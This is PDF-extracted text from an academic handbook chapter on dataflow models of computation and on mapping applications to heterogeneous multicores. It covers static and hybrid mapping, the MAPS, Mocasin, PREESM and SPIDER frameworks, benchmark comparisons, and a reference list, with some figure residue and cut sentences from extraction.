Inspired by formal MoCs, recent work focused on devising a mathematical model
of the system-level architecture, called Model of Architecture (MoA) (Pelcat et al.
2016, 2018) (term and relation to MoCs first coined in Gerstlauer et al. 2009).
This allows the mapping tool to directly use the system-level description of the
target system in form of a MoA to evaluate the performance (or other metric) of an
application described in a particular MoC. In this way, there is no need to resort to
more detailed trace-based or full-system simulators as discussed in the following.
that it is possible to reason about energy consumption at the level of the compiler
intermediate representation (Georgiou et al. 2017). If the target system is available,
performance and energy numbers can be measured and fed back to the mapping tool.
This has been studied thoroughly in recent years for standard processors (Meneses-
Viveros et al. 2021) and is well understood for embedded systems. The PAPIFY
tool (Madronal et al. 2019), for instance, relies on performance counters of the
architecture to measure the energy consumed by different parts of a system at
runtime. By measuring clock cycles and cache misses for each actor firing, as well
as an internal energy model, PAPIFY can automatically provide useful performance
and energy metrics to improve the mapping of dataflow applications.
Based on cost models for computation and communication, different approaches
can be used to model the performance of the entire application provided a mapping.
Depending on the MoC, this can be done statically or with analytical models (cf.
MoA mentioned above). For more dynamic models, trace-based simulators use the
information in the system-level description and the costs associated with application
nodes and edges to estimate the metrics for the parallel execution (Pelcat et al.
2014; Pimentel et al. 2006; Menard et al. 2021) (cf. Chap. 26, “Methodologies
for Design Space Exploration”). Most of these trace-based simulators execute
considerably faster than system-level simulators (cf. Chap. 27, “Virtual Prototyp-
ing of Processor-Based Platforms”). Properties of the MoC, such as determinism,
legitimize trace-based simulation. This means, for instance, that small deviations
in the real parallel schedule in the target system are guaranteed not to change the
output of the application as observed during tracing (provided the same inputs, in
the case of dynamic MoCs).
Static Mapping
the application like buffer sizes, include constraints for mapping to accelerators, and
compute an order for elements that are mapped to the same resource. Note that such
formulations impose implicit constraints on valid solutions. For instance, a mapping
of a channel f = (ai , aj ) ∈ F , μF (f ) = l ∈ L is valid only if the cores resulting
from the mapping μA (ai ) = ck ∈ C and μA (aj ) = cm ∈ C are indeed connected
via the link l, that is, l = (ck , cm ) ∈ L. Similarly, an edge mapping must respect the
size constrains of the underlying resources of a selected link, for instance, the size
of the physical memories.
Figure 11 shows a generic static mapping flow. As inputs, the mapper takes
the application model, the architecture model, and constraints. Constraints can
represent real-time requirements, such as a given throughput for an actor, or a
latency constraint over a path in the graph. Constraints can also define prescribed
mappings for actors, in the case an actor can only be mapped to an accelerator, or a
predefined subset of resources that implement a given functionality, like a mapping
to a set of cores with access to a particular peripheral. Often the mapper iterates
multiple times before finding a suitable solution that is then passed as the final result
(μ∗A , μ∗F in the figure).
For static dataflow models, a common approach to compute a mapping consists
in analyzing one or several unrolled iterations of the graph (recall from sec-
tions “Homogeneous Synchronous Dataflow (HSDF)” and “Synchronous Dataflow
(SDF)”). In the SDF case, this amounts to an HSDF transformation, unfolding
the resulting HSDF graph and removing edges with delays. The resulting graph
is a directed acyclic graph for which a wealth of methods exist to compute a
mapping (Kwok and Ahmad 1999). The schedule resulting from a so-computed
mapping is called a block schedule, since iterations of the unrolled graph do
not overlap in time during the execution of the application. Algorithms also
exist for computing overlapped schedules and thus exploit graph-level pipeline
parallelism (Honorat et al. 2020).
Although the nature and order of computations in dynamic dataflow MoCs are,
by definition, data-dependent, the mapping of computational nodes on processing
elements, be they actors or processes, is often done statically. The scheduling
decisions, however, which order computations on the different processing elements,
are mandatorily taken at runtime for such models. For KPNs and other dynamic
dataflow models, representative runs of the application are required for the mapper
to understand how processes in the application exchange information with one
another. Each application run is modeled via traces, which record the read and write
events on the channels (Castrillon et al. 2010; Van Stralen and Pimentel 2010). The
traces can be used directly to replay the application behavior on a high-level discrete
event simulator (Pimentel et al. 2006; Castrillon et al. 2013; Brunet et al. 2013) or
can be represented as a graph (Castrillon et al. 2012; Brunet 2015). For the latter,
edges model production-consumption relationships, buffer sizing constraints, and
guarded actions in dynamic dataflow actors among others. A graph representation
enables defining quick heuristics that does not require replaying the traces on a
simulator (Castrillon et al. 2013; Brunet 2015).
Apart from heuristics crafted for the special purpose of solving the static mapping
problem, several meta-heuristics have been adapted to solve the problem as well.
A meta-heuristic is a generic solution approach that can be reused and adapted
for particular problem formulations. Genetic algorithms, for instance, mimic the
process of evolution in a pool of solutions to a given problem. Each solution,
or individual, is encoded as a string or chromosome. The pool of solutions is
evolved over generations by using operators for mutation (of a single individual) and
crossover of two individuals, which mimics the reproduction process. Chapter 26,
“Methodologies for Design Space Exploration” goes into much more detail about
how this process can be further customized to solve the static mapping problem.
Other meta-heuristics include random walk, simulated annealing (Kirkpatrick et al.
1983), and tabu search (Glover 1989).
In practical frameworks, the mapping problem cannot be fully decoupled from
the implementation. Actor firings can be implemented by means of a task runtime
that distributes ready tasks to worker threads in a way predefined by the computed
mapping (cf. Chap. 30, “Parallel Programming Models” for modern task-based
runtime systems). Actor firings can also be statically scheduled within threads
mapped to cores or managed freely by the operating system (Hautala et al. 2018).
Alternatively, an actor or a process in a KPN can be mapped to a persistent thread
(one process per thread), with the mapping enforced via pinning. A combination of
these implementations is also possible, which further complicates the analysis and
optimization of mappings. Similar implementation options exist for communication
channels, which can be implemented by true message passing, by implementing
FIFO buffers in shared memory, or by a custom memory pool that allows for memory
reuse between logical buffers. In addition, as mentioned in section “Dataflow
Models of Computation”, techniques exist to reuse memory space for multiple
channels for dataflow (Desnos et al. 2015) and for KPNs (Tretter 2018).
1132 J. Castrillon et al.
Hybrid Mapping
Variant selection
System
Constraints status
Variant transform
Dynamic
Additional mapping
constraints
partial solution or select a mapping candidate by taking into account the current
state of the system. The state of the system consists in a description of the resource
occupation of the system at application launch time (this is represented as white
boxes in Fig. 12). Apart from the system status, the dynamic phase may also receive
additional constraints for a particular execution of the application. These constraints
help in selecting a subset of the Pareto front described by the variants.
The work in Weichslgartner et al. (2018) is a good representative of a hybrid
mapping methodology which was developed in the context of the Collaborative
Research Center “Invasive Computing” (Teich et al. 2011). The authors use a
hybrid mapping approach for applications represented as task graphs to increase
the utilization of a multicore while respecting real-time constraints and saving
resources. In this particular work, static mapping decisions are encoded as a set of
constraints. A constraint can, for instance, specify what kind of cores should execute
a task (by delivering an execution time below a bound), or at most how far away
two tasks can be mapped. Distance, in this case, can refer to the number of hops for
different routes in a NoC-based architecture. The constraint representation allows
for resource sharing (processors and network links), as opposed to strict spatial
isolation, which increases the utilization of the system as a whole. At runtime,
a constraint solver can be used to determine the final mapping. The authors also
propose a faster backtracking heuristic to reduce the complexity of the runtime
mapping phase.
The works in Singh et al. (2011), Quan and Pimentel (2015), and Goens et al.
(2017a) are good examples of methodologies that pre-compute a set of candidate
mappings that are later selected at runtime. In its simplest form, the runtime mapper
consists of a look-up for the mapping that meets the requirements and fits in the
available resources. This requires less effort than solving a set of constraints but,
naturally, will fail more often since the mappings remain quite rigid. To relax
this, the work in Goens et al. (2017a) relies on the exploitation of platform and
application symmetries, as formalized in Goens et al. (2017b). A symmetry refers
to a transformation that can be applied to a static mapping without changing the
characteristics of the mapping, that is, two symmetric mappings should lead to
the same performance and energy consumption. Symmetries allow clustering static
mappings into equivalence classes, reducing the search space at compile time, and
enabling transformations at runtime. The symmetry-aware runtime system achieved
performance on par with the Linux Completely Fair Scheduler (CFS) scheduler
while reducing the time variation by two to three orders of magnitude. Symmetries
are more restrictive than generic constraints, since they require mappings to be
equivalent as opposed to be either equal or better. Efficient algorithms based on
symmetries make it possible to switch mapping configurations during the execution
of an application to reduce the overall energy consumption while respecting real-
time constraints (Khasanov and Castrillon 2020; Khasanov et al. 2021).
Another kind of hybrid mapping strategy for dynamic dataflow MoCs consists
of first using a statically defined mapping and using runtime-collected metrics to
update this mapping sporadically (Yviquel et al. 2017).
1134 J. Castrillon et al.
The MAPS project started around 2007 at the RWTH Aachen University, originally
as a trace-driven auto-parallelizing compiler (Ceng et al. 2008). Over the years, the
framework was extended with a high-level simulator for parallel execution (Ceng
et al. 2009), support for parallel applications (Leupers and Castrillon 2010),
mapping heuristics for multiple concurrent applications (Castrillon et al. 2010),
support for hardware accelerators (Castrillon et al. 2011), and support for multiple
backends and ESL simulators. Today, the ideas in MAPS continue to be developed
31 Dataflow Models of Computation for Programming Heterogeneous Multicores 1135
academically at the RWTH Aachen and the TU Dresden universities and commer-
cially at Silexica GmbH/Inc (Leupers et al. 2017).
For parallel applications, MAPS defined the language C for Process Networks
(CPN) to describe parallel applications using the KPN MoC. CPN is an extension
to the C language with keywords for KPN processes, SDF actors, channels, and
parameters (Castrillon and Leupers 2014) (akin to the example in Fig. 7). As
discussed in section “Static Mapping”, given the dynamic MoC, mapping heuristics
in MAPS rely on traces following a flow similar to that in Fig. 11. With detailed cost
models of the TI DSPs, trace-based mapping heuristics managed to obtain results
comparable to those obtained via manual optimization by expert programmers
as reported in Leupers et al. (2017). A comparative analysis of the quality of
the mappings obtained with simple heuristics and genetic algorithms for KPN
applications can be found in Goens et al. (2016).
Figure 13 shows an updated version of this comparison on a heterogeneous ARM
big.LITTLE platform as described in Fig. 9a. The heuristics used are the Group-
Based Mapping (GBM) heuristic (Castrillon et al. 2012) and a static variant of the
Linux CFS. The metaheuristics include a random walk, simulated annealing (Orsila
et al. 2007), tabu search (Manolache et al. 2008), and genetic algorithms (Erbas et al.
2006). These mapping algorithms were executed ten times on each application of
the Embedded System Synthesis Benchmark Suite (E3S) benchmarks (Dick 2008),
which were adapted to multicore systems using the method presented by Schwarzer
et al. (2017). The figure reports the (geometric) means of the relative times, both for
the execution time of the application with the generated mapping and the exploration
time required. Unsurprisingly, metaheuristics can produce better mappings but
require considerably more computational time.
The situation changes when the complexity of the platform increases. Figure 14
shows the same experiments, this time on a model of the Kalray MPPA3
Coolidge (Kalray Inc 2020). This platform consists of 5 identical clusters fully
connected in a NoC, where each of the clusters has 16 identical cores, as well
as specialized secure and management cores. The difference in performance of
15
Rel. execution time
1.5
10
1.0
5
0.5
0 21.5 15.88 7.95 1.23 0.97 1 0.0 0.14 0.13 0.97 0.6 1.79 1
12
0
7.7 0.14 7.72 4.09 5.1 1 0 2.62 0.11 1.49 8.36 2.28 1
Fig. 14 Comparison of multiple mapping heuristics and metaheuristics on the Kalray MPPA3
Coolidge platform for the E3S benchmark suite
heuristics and metaheuristics in these larger platforms is less marked. Notably, the
static CFS heuristic significantly outperforms every other algorithm, both in terms of
mapping quality and exploration time. More sophisticated metaheuristics have more
trouble with extremely large design spaces. Indeed, for the largest application in the
E3S benchmarks, the design space has 859 ≈ 2.3 · 1017 mappings, which is more
than 109 times larger than the design space for the big.LITTLE architecture above.
More recently, approaches based on exploiting the symmetry of the prob-
lem (cf. section “Hybrid Mapping”) have helped in reducing the size of design
spaces (Goens et al. 2017b; Schwarzer et al. 2017). Figure 15 shows the same setup
as above, evaluating the E3S benchmarks on the same two platforms. In the figure,
a standard variant of the algorithms is compared to one where the design space is
pruned using symmetries. In terms of exploration time, using symmetries tends to
reduce the time by a considerable amount. More importantly, however, they seem
to mitigate the poor performance of the metaheuristics on the more complex design
space of the MPPA3 Coolidge. The same simulated annealing heuristic performs an
average of 32× better on this symmetry-pruned design space.
In a recent effort, these newer developments as well as a subset of the methods
described in section “Optimization of Dataflow Programs” were combined into the
Mocasin toolbox (Menard et al. 2021) and released under an open-source license
(Mocasin GitHub Repository: https://github.com/tud-ccc/mocasin.). Mocasin pro-
vides a high-level simulator for performance estimation and implements various
mapping strategies, including the symmetry-based and hybrid approaches discussed
above. Mocasin does not provide a complete tool flow from source code to an
optimized implementation tailored for a specific platform. Mocasin, instead, is a
tool designed specifically to support researchers in their effort of developing better
strategies for mapping complex applications to heterogeneous many-cores. There-
fore, Mocasin is designed as a flexible infrastructure with increased interoperability
with other tools, allowing for quick prototyping and evaluation of new approaches.
Since Mocasin already implements a wide range of known mapping strategies, new
methods can be directly compared to the state of the art in a comparison similar
to the one shown in Figs. 13 and 14. The authors expect Mocasin and similar
31 Dataflow Models of Computation for Programming Heterogeneous Multicores 1137
ARM big.LITTLE
1.0
Time (normed,log)
0.1
Standard
10.0
Symmetries
MPPA3 Coolidge
1.0
0.1
tic
tic
lk
lk
ch
ch
g
g
ne
ne
wa
wa
in
in
ar
ar
ge
ge
al
al
se
se
m
om
ne
ne
bu
bu
do
an
an
nd
ta
ta
n
ra
ra
ed
ed
at
at
ul
ul
sim
sim
Mapping algorithm
PREESM
PREESM, which stands for Parallel and Real-time Embedded Executives Scheduling
Method, is an open-source rapid prototyping framework created in 2007 at the
IETR, in collaboration with Texas Instruments (Pelcat et al. 2014). PREESM is
developed as a set of plugins for the Eclipse integrated development environment.
As a rapid prototyping framework, the purpose of PREESM is to enable developers
to design an application and to rapidly assess Key Performance Indicators (KPIs)
of its deployment on a given heterogeneous MPSoC. For example, KPIs optimized
and predicted by PREESM are computation and communication resource utiliza-
tion (Pelcat et al. 2009, 2016), application throughput and latency (Pelcat et al.
2009; Deroui et al. 2017), energy consumption (Pelcat et al. 2016; Holmbacka et al.
2014), or memory footprint (Desnos et al. 2015, 2016). In addition to predicting
these metrics, PREESM also offers software synthesis capabilities for generating
working prototypes on commercial multi- and many-core chips (Pelcat et al. 2014;
Hascoët et al. 2017).
The workflow adopted by PREESM is the Y-chart methodology (Kienhuis et al.
2001) depicted in Fig. 11. The three inputs taken by PREESM are:
SPIDER
In PREESM, all mapping, scheduling, and memory allocation decisions are made
statically at compile time, which forbid the use of reconfigurable capacities of
the π SDF MoC. In order to run a dynamically reconfigurable π SDF graph,
a runtime manager is needed to handle graph reconfigurations and to manage
resource allocation on-the-fly while executing the application. The Synchronous
Parameterized and Interfaced Dataflow Embedded Runtime (SPIDER) (Heulot et al.
2014) serves that purpose for reconfigurable π SDF graphs.
The inputs and workflow of SPIDER is identical to that of PREESM, illustrated in
Fig. 11, with two major differences. (1) Values of reconfigurable parameters of the
π SDF graph are set dynamically by configuration actors of the application, and as
a result, (2) all graph transformation and resource allocation decisions are made at
runtime. Using a runtime manager to control the execution of a reconfigurable graph
has an overhead on application performance. Indeed, such runtime manager requires
processor time to compute repetition vectors, to perform graph transformations,
and to map and schedule actor firings. Nevertheless, as presented in Heulot et al.
(2013, 2014), even with large reconfigurable graphs with several hundreds of
actors, this overhead is largely compensated by the efficiency of the scheduling
decisions. The performance of SPIDER proved to be on par with, or better than,
OpenMP performance for suitable applications (Heulot et al. 2014). As for PREESM,
the performance of SPIDER was assessed on a wide variety of signal and image
processing applications and on several commercial heterogeneous multi- and many-
core targets.
In recent development, leading to the release of SPIDER 2.0 (SPIDER 2.0 GitHub
Repository: https://github.com/preesm/spider2), the efficiency of the SPIDER for
mapping and scheduling π SDF graphs was greatly improved by using a numerical
representation instead of performing the π SDF to HSDF transformation (Arrestier
et al. 2019). By using a numerical representation instead of building and storing
HSDF graphs for resource allocations, the memory footprint of the runtime manager
was reduced on average by 97%, and the overhead of the runtime manager was
reduced on average by 85%.
1140 J. Castrillon et al.
This chapter discussed how dataflow MoCs and MoCs in general are appealing
alternatives to get a handle on the complexity of programming modern MPSoCs. It
provided definitions and examples of the most prominent dataflow MoCs, including
HSDF, SDF, and KPN, and gave insight into more recent adaptable models such as
π SDF. The chapter also explains how the properties of a MoC can be leveraged to
engineer tool flows that, based on models of the target system, produce an optimized
implementation of the program. Static and hybrid optimization approaches were
discussed and illustrated by means of two academic tools with more than a decade
of research, MAPS and PREESM. Moving forward, the authors expect efforts to
consolidate into open-source tools like PREESM, Ptolemy (Ptolemaeus 2014) and
Mocasin (Menard et al. 2021). Interoperability and fast prototyping of models and
algorithms will speed up advances in the field. Such advances are dearly needed,
with ever more dynamic workloads coming up in interconnected emerging appli-
cations like autonomous driving and 5G communication. Similarly, emerging tech-
nologies (Castrillon et al. 2018) and interconnect (Fettweis et al. 2019) will require
a more principled approach to program synthesis, enabled in part by future MoCs.
Acknowledgments This work was funded in part by the German Federal Ministry of Education
and Research (BMBF) through the E4C project (16ME0426K), by the BMBF project 6G-life hub
(16KISK001K), by the German Research Foundation (DFG) through TraceSymm (366764507),
by the Studienstiftung des Deutschen Volkes, by the CERBERO (Cross-layer modEl-based fRame-
work for multi-oBjective dEsign of Reconfigurable systems in unceRtain hybRid envirOnments)
Horizon 2020 Project, by the European Union Commission under Grant 732105, and by the French
Agence Nationale de la Recherche under grant ANR-20-CE46-0001 (DARK-ERA project).
References
Alur R, Courcoubetis C, Dill D (1990) Model-checking for real-time systems. In: [1990]
Proceedings. Fifth annual IEEE symposium on logic in computer science. IEEE, pp 414–425
Arrestier F, Desnos K, Juarez E, Menard D (2019) Numerical representation of directed acyclic
graphs for efficient dataflow embedded resource allocation. ACM Trans Embed Comput Syst
18(5s). ISSN: 1539-9087. https://doi.org/10.1145/3358225
Bebelis V, Fradet P, Girault A, Lavigueur B (2013) BPDF: a statically analyzable dataflow model
with integer and boolean parameters. In: 2013 proceedings of the international conference on
embedded software (EMSOFT). IEEE, pp 1–10
Bhattacharya B, Bhattacharyya SS (2001) Parameterized dataflow modeling for DSP systems.
IEEE Trans Sig Process 49(10):2408–2421
Bhattacharyya SS, Brebner G, Janneck JW, Eker J, Von Platen C, Mattavelli M, Raulet M
(2009) OpenDF: a dataflow toolset for reconfigurable hardware and multicore systems. ACM
SIGARCH Comput Archit News 36(5):29–35
Bilsen G, Engels M, Lauwereins R, Peperstraete J (1996) Cycle-static dataflow. IEEE Trans Sig
Process 44(2):397–408
Biscondi E, Flanagan T, Fruth F, Lin Z, Moerman F (2012) Maxi-mizing multicore efficiency with
navigator runtime, White Paper. www.ti.com/lit/wp/spry190/spry190.pdf
Bouakaz A, Talpin J-P, Vitek J (2012) Affine data-flow graphs for the synthesis of hard real-time
applications. In: 2012 12th international conference on application of concurrency to system
design. IEEE, pp 183–192
31 Dataflow Models of Computation for Programming Heterogeneous Multicores 1141
Brunet SC (2015) Analysis and optimization of dynamic dataflow programs. PhD thesis, Ecole
Polytechnique Federale de Lausanne (EPFL)
Brunet SC, Alberti C, Mattavelli M, Janneck J (2013) Turnus: a unified dataflow design space
exploration framework for heterogeneous parallel systems. In: 2013 conference on design and
architectures for signal and image processing (DASIP), pp 47–54
Buck JT (1993) Scheduling dynamic dataflow graphs with bounded memory using the token flow
model. PhD thesis, EECS Department, University of California, Berkeley. http://www2.eecs.
berkeley.edu/Pubs/TechRpts/1993/2429.html
Castrillon J, Leupers R (2014) Programming heterogeneous MPSoCs: tool flows to close the
software productivity gap. Springer, p 258. ISBN: 978-3-319-00675-8. https://doi.org/10.1007/
978-3-319-00675-8
Castrillon J, Velásquez R, Stulova A, Sheng W, Ceng J et al (2010) Trace-based KPN composability
analysis for mapping simultaneous applications to MPSoC platforms. In: Proceedings of
the conference on design, automation and test in Europe DATE’10. European Design and
Automation Association, Dresden, pp 753–758. ISBN: 978-3-9810801-6-2. http://dl.acm.org/
citation.cfm?id=1870926.1871107
Castrillon J, Schürmans S, Stulova A, Sheng W, Kempf T et al (2011) Component-based
waveform development: the nucleus tool flow for efficient and portable software defined radio.
Analog Integr Circuits Sig Process 69(2–3):173–190. ISSN: 0925-1030. https://doi.org/10.
1007/s10470-011-9670-1
Castrillon J, Tretter A, Leupers R, Ascheid G (2012) Communication-aware mapping of KPN
applications onto heterogeneous MPSoCs. In: Proceedings of the 49th annual design automation
conference DAC’12. ACM, San Francisco, pp 1266–1271. ISBN: 978-1-4503-1199-1. https://
doi.org/10.1145/2228360.2228597
Castrillon J, Leupers R, Ascheid G (2013) MAPS: mapping concurrent dataflow applications to
heterogeneous MPSoCs. IEEE Trans Ind Inform 9(1):527–545. ISSN: 1551-3203. https://doi.
org/10.1109/TII.2011.2173941
Castrillon J, Lieber M, Klüppelholz S, Völp M, Asmussen N et al (2018) A hardware/soft-
ware stack for heterogeneous systems. IEEE Trans Multi-Scale Comput Syst 4(3):243–259.
ISSN: 2332-7766. https://doi.org/10.1109/TMSCS.2017.2771750. http://ieeexplore.ieee.org/
document/8103042/
C/DA Design Automation (2020) IEEE standard for software-hardware interface for multi- many-
core. In: IEEE Std 2804-2019, pp 1–84. https://doi.org/10.1109/IEEESTD.2020.8985663.
https://standards.ieee.org/standard/28042019.html
Ceng J, Castrillon J, Sheng W, Scharwächter H, Leupers R et al (2008) MAPS: an integrated
framework for MPSoC application parallelization. In: Proceedings of the 45th annual design
automation conference DAC’08. ACM, Anaheim, pp 754–759. ISBN: 978-1-60558-115-6.
https://doi.org/10.1145/1391469.1391663
Ceng J, Sheng W, Castrillon J, Stulova A, Leupers R, Ascheid G, Meyr H (2009) A high-
level virtual platform for early MPSoC software development. In: Proceedings of the 7th
IEEE/ACM international conference on hardware/software codesign and system synthesis
(CODES+ISSS’09). ACM, Grenoble, pp 11–20. ISBN: 978-1-60558-628-1. http://doi.org/10.
1145/1629435.1629438
Church A (1985) The calculi of lambda-conversion, vol 6. Princeton University Press, Princeton
Dardaillon M, Marquet K, Risset T, Martin J, Charles H-P (2016) A new compilation flow
for software-defined radio applications on hetero-geneous MPSoCs. ACM Trans Archit Code
Optim (TACO) 13(2):1–25
de Dinechin BD (2013) Dataflow language compilation for a single chip massively parallel
processor. In: 2013 IEEE 6th international workshop on multi-/many-core computing systems
(MuCoCoS). IEEE. pp 1–1
de Dinechin BD (2015) Kalray MPPA®: massively parallel processor array: revisiting DSP
acceleration with the Kalray MPPA manycore processor. In: 2015 IEEE hot chips 27 symposium
(HCS). IEEE, pp 1–27
1142 J. Castrillon et al.
Dennis JB (1974) First version of a data flow procedure language. In: Robinet B (ed) Programming
symposium. Springer, Berlin/Heidelberg, pp 362–376. ISBN: 978-3-540-37819-8
Deroui H, Desnos K, Nezan J-F, Munier-Kordon A (2017) Relaxed subgraph execution model for
the throughput evaluation of IBSDF graphs. In: 2017 international conference on embedded
computer systems: architectures, modeling, and simulation (SAMOS). IEEE, pp 213–220
Desnos K, Pelcat M, Nezan J-F, Bhattacharyya SS, Aridhi S (2013) Pimm: parameterized and
interfaced dataflow meta-model for mpsocs runtime reconfiguration. In: 2013 international
conference on embedded computer systems: architectures, modeling, and simulation (SAMOS).
IEEE, pp 41–48
Desnos K, Pelcat M, Nezan J-F, Aridhi S (2015) Memory analysis and optimized allocation of
dataflow applications on shared-memory MPSoCs. J Sig Process Syst 80(1):19–37
Desnos K, Pelcat M, Nezan J-F, Aridhi S (2016) Distributed memory allocation technique for
synchronous dataflow graphs. In: 2016 IEEE international workshop on signal processing
systems (SiPS). IEEE, pp 45–50
Dick R (2008) Embedded Systems Synthesis Benchmark Suite (e3s). http://ziyang.eecs.umich.edu/
%5C~%7B%7Ddickrp/e3s/
Ecker W, Müller W, Dömer R (2009) Hardware-dependent software. Springer, Dordrecht, pp 1–13
Eker J, Janneck J (2003) CAL language report Technical report, ERL Technical Memo UCB/ERL,
Springer Netherlands
Erbas C, Cerav-Erbas S, Pimentel AD (2006) Multiobjective optimization and evolutionary
algorithms for the application mapping problem in multiprocessor system-on-chip design. IEEE
Trans Evol Comput 10(3):358–374
Eusse JF, Williams C, Leupers R (2014) CoEx: a novel profiling-based algorithm/architecture
co-exploration for ASIP design. ACM Trans Reconfig Technol Syst. https://doi.org/10.1109/
ReCoSoC.2013.6581520
Fettweis G, Dörpinghaus M, Castrillon J, Kumar A, Baier C et al (2019) Architecture and
advanced electronics pathways towards highly adaptive energy-efficient computing. Proc
IEEE 107(1):204–231. ISSN: 0018-9219. https://doi.org/10.1109/JPROC20182874895. https://
ieeexplore.ieee.org/document/8565890
Fradet P, Girault A, Krishnaswamy R, Nicollin X, Shafiei A (2018) RDF: Reconfigurable Dataflow
(extended version), Technical report INRIA Grenoble-Rhône- Alpes
Gao L, Huang J, Ceng J, Leupers R, Ascheid G, Meyr H (2009) TotalProf: a fast and accurate
retargetable source code profiler. In: CODES+ISSS’09: proceedings of the 7th IEEE/ACM
international conference on hardware/software codesign and system synthesis. ACM, Grenoble,
pp 305–314. ISBN: 978-1-60558-628-1. https://doi.org/10.1145/1629435.1629477
Georgiou K, Kerrison S, Chamski Z, Eder K (2017) Energy transparency for deeply embedded
programs. ACM Trans Archit Code Optim (TACO) 14(1):1–26
Gerstlauer A, Haubelt C, Pimentel AD, Stefanov TP, Gajski DD, Teich J (2009) Electronic
system-level synthesis methodologies. IEEE Trans Comput-Aided Des Integr Circuits Syst
28(10):1517–1530
Ghasemi A, Cataldo R, Diguet J-P, Martin KJM (2021) On cache limits for dataflow applications
and related efficient memory management strategies. In: Workshop on design and architectures
for signal and image processing, 14th edn., pp 68–76
Gleim U, Levy M (2013) MTAPI: parallel programming for embedded multicore systems. In: The
multicore association
Glover F (1989) Tabu search—part I. ORSA J Comput 1(3):190–206
Goens A, Khasanov R, Castrillon J, Polstra S, Pi-mentel A (2016) Why comparing system-
level MPSoC mapping approaches is difficult: a case study. In: Proceedings of the IEEE 10th
international symposium on embedded multicore/many-core systems-on-chip (MCSoC-16),
Ecole Centrale de Lyon, Lyon, pp 281–288. https://doi.org/10.1109/MCSoC.2016.48
Goens A, Khasanov R, Hähnel M, Smejkal T, Härtig H, Castrillon J (2017a) TETRiS: a multi-
application run-time system for predictable execution of static mappings. In: Proceedings of the
20th international workshop on software and compilers for embedded systems (SCOPES’17).
31 Dataflow Models of Computation for Programming Heterogeneous Multicores 1143
Kienhuis B, Deprettere EF, Van der Wolf P, Vissers K (2001) A methodology to design
programmable embedded systems. In: International workshop on embedded computer systems.
Springer, pp 18–37
Kirkpatrick S, Gelatt CD, Vecchi MP (1983) Optimization by simulated annealing. Science
220(4598):671–680
Klikpo EC, Khatib J, Munier-Kordon A (2016) Modeling multi-periodic simulink systems
by synchronous dataflow graphs. In: 2016 IEEE real-time and embedded technology and
applications symposium (RTAS). IEEE, pp 1–10
Koliogeorgi K, Voss N, Fytraki S, Xydis S, Gaydadjiev G, Soudris D (2019) Dataflow acceleration
of smith-waterman with traceback for high throughput next generation sequencing. In: 2019
29th international conference on field programmable logic and applications (FPL). IEEE, pp 74–
80
Kwok Y-K, Ahmad I (1999) Static scheduling algorithms for allocating directed task graphs to
multiprocessors. ACM Comput Surv 31(4):406–471. ISSN: 0360-0300. http://doi.org/10.1145/
344588.344618
Lee EA (2006) The problem with threads. Computer 39(5):33–4
Lee EA, Ha S (1989) Scheduling strategies for multiprocessor real-time DSP. In: 1989 IEEE global
telecommunications conference and exhibition ‘communications technology for the 1990s and
beyond’. IEEE, pp 1279–1283
Lee EA, Messerschmitt DG (1987) Synchronous data flow. Proc IEEE 75(9):1235–1245
Lee EA, Messerschmitt DG (1987) Static scheduling of synchronous data flow programs for digital
signal processing. IEEE Trans Comput 100(1):24–35
Lee EA, Parks TM (1995) Dataflow process networks. Proc IEEE 83(5):773–801
Lee EA, Seshia SA (2016) Introduction to embedded systems: a cyber-physical systems approach.
MIT Press, Cambridge, MA
Leroy X (2009) Formal verification of a realistic compiler. Commun ACM 52(7):107–115
Lesparre Y, Munier-Kordon A, Delosme J (2016) Evaluation of synchronous dataflow graph
mappings onto distributed memory architectures. In: 2016 Euromicro conference on digital
system design (DSD), pp 146–153. https://doi.org/10.1109/DSD.2016.52
Leupers R, Castrillon J (2010) MPSoC programming using the MAPS compiler. In: Proceedings of
the design automation conference (ASP-DAC), 2010 15th Asia and South Pacific, pp 897–902.
https://doi.org/10.1109/ASPDAC.2010.5419677
Leupers R, Aguilar MA, Eusse JF, Castrillon J, Sheng W (2017) MAPS: a software development
environment for embedded multicore applications. In: Ha S, Teich J (eds) Handbook of
hardware/software codesign. Springer, Dordrecht, pp 1–33. ISBN: 978-94-017-7358-4. https://
doi.org/10.1007/978-94-017-7358-4_2-1
Lin S, Wang L-H, Vosoughi A, Cavallaro JR, Juntti M et al (2015) Parameterized sets of dataflow
modes and their application to implementation of cognitive radio systems. J Sig Process Syst
80(1):3–18
Lohstroh M, Romero ÍÍ, Goens A, Derler P, Castrillon J, Lee EA, Sangiovanni-Vincentelli A
(2020) Reactors: a deterministic model for composable reactive systems. In: Chamberlain R,
Grimheden ME, Taha W (eds) Cyber physical systems. Model-based design – proceedings of
the 9th workshop on design, modeling and evaluation of cyber physical systems (CyPhy 2019)
and the workshop on embedded and cyber-physical systems education (WESE 2019). Springer
International Publishing, New York City, pp 59–85. ISBN: 978-3-030-41131-2. https://doi.org/
10.1007/978-3-030-41131-2_4
Madronal D, Arrestier F, Sancho J, Morvan A, Lazcano R et al (2019) Papify: automatic
instrumentation and monitoring of dynamic dataflow applications based on papi. IEEE Access
7:111801–111812
Manolache S, Eles P, Peng Z (2008) Task mapping and priority assignment for soft real-time
applications under deadline miss ratio constraints. ACM Trans Embed Comput Syst (TECS)
7(2):1–35
Marwedel P, Bacivarov I, Lee C, Teich J, Thiele L et al (2011) Mapping of applications to MPSoCs.
In: Proceedings of the 9th international conference on hardware/software codesign and system
synthesis (CODES+ISSS),Springer, New York, NY, pp 109–118
31 Dataflow Models of Computation for Programming Heterogeneous Multicores 1145
Schuermans S, Leupers R (2019) Power estimation on electronic system level using linear power
models. Springer, Cham
